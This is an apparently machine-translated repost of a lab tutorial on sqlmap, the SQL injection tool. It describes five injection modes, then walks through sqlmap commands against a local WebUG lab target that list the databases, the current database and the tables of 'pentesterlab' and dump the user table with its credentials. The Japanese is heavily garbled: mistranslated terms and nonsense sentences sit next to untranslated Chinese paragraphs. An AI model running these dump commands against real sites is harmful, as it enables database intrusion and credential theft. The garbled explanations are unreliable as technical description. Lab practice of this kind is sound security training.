基本的な2-SQLMAPをテストするための安全ドリル

SQLMAPについて

SQLMAPは、権限のSQLインジェクションの脆弱性、データベースサーバへのアクセスを使用して、自動テストのために使用することができるオープンソースの侵入テストツールです。

これは、データベースに格納されたデータへのアクセスを含め、データベースの異なるタイプのための強力な検出エンジン、侵入テストのオプションがあり、オペレーティング・システム・ファイルにアクセスしても、オペレーティング・システムのコマンドを実行してパックされたデータを介して接続することができます。

これは、セキュリティは、MySQLやOracle、PostgreSQLのは、Microsoft SQL Serverの、Microsoft Accessの、IBM DB2、SQLiteの、Firebirdの、SybaseとSAP MaxDBのデータベースや他のテストを脆弱性をサポートしています。

これは、5つの異なる注入モードをサポートしています。

戻りページによると、注射の真と偽の条件を決定することができブールブラインド、に基づいて、

時間ベースのブラインドを、その判断は、遅延時間(つまり、ページの復帰時間は条件に増加されているかどうかを確認するために、ページの内容に応じた声明文を任意の情報を返すことができません)を判断するステップと

、エラー注入に基づいて、つまり、ページは、エラー・メッセージ、または直接バックページに文の注入の結果を返すであろう

関節問い合わせ注射、組合を用いた場合の注入; 

ヒープ問い合わせ注入を同時に多数を行うことができます文の実行に注入された場合。

SQLMAPインストールは非常に簡単です。あなただけがpython2.7環境で実行する必要がSQLMAPをインストールピップインスタントの袋を開くために。

 

ドローンデモ

そして、上の手で注入されたSQL 我々はデモSQLMAPを行います  

最もシンプルで、粗な方法は、我々は、バースト・コマンドライブラリをノック指示します。あなたは、現在のシステムの下でデータベース名のすべてを公開することができます

SQLMAP -u "http://192.168.1.3/webug/pentest/test/sqli/sqltamp.php?gid=1" --batch --dbs

 

それとも、私たちはただ、現在のSQLに対応するデータベースの名前をしたいので、醜いと食べたくありません

sqlmap -u "http://192.168.1.3/webug/pentest/test/sqli/sqltamp.php?gid=1" -p gid --current-db

 

接着我们来爆表名。暴露出 pentesterlab 数据下的四张表。

 

sqlmap -u "http://192.168.1.3/webug/pentest/test/sqli/sqltamp.php?gid=1" -p gid  -D  pentesterlab --tables

 

接下来是暴露表字段。我们需要dump user表下面的字段信息并保存到本地文件。俗称脱裤。

sqlmap -u "http://192.168.1.3/webug/pentest/test/sqli/sqltamp.php?gid=1" -p gid  -D  pentesterlab -T user --dump

这样,我们靶机的系统用户名和密码就全部暴露出来了。是不是很简单?

 

演示视频:https://asciinema.org/a/46601

 

おすすめ

転載: www.cnblogs.com/Zfc-Cjk/p/11367279.html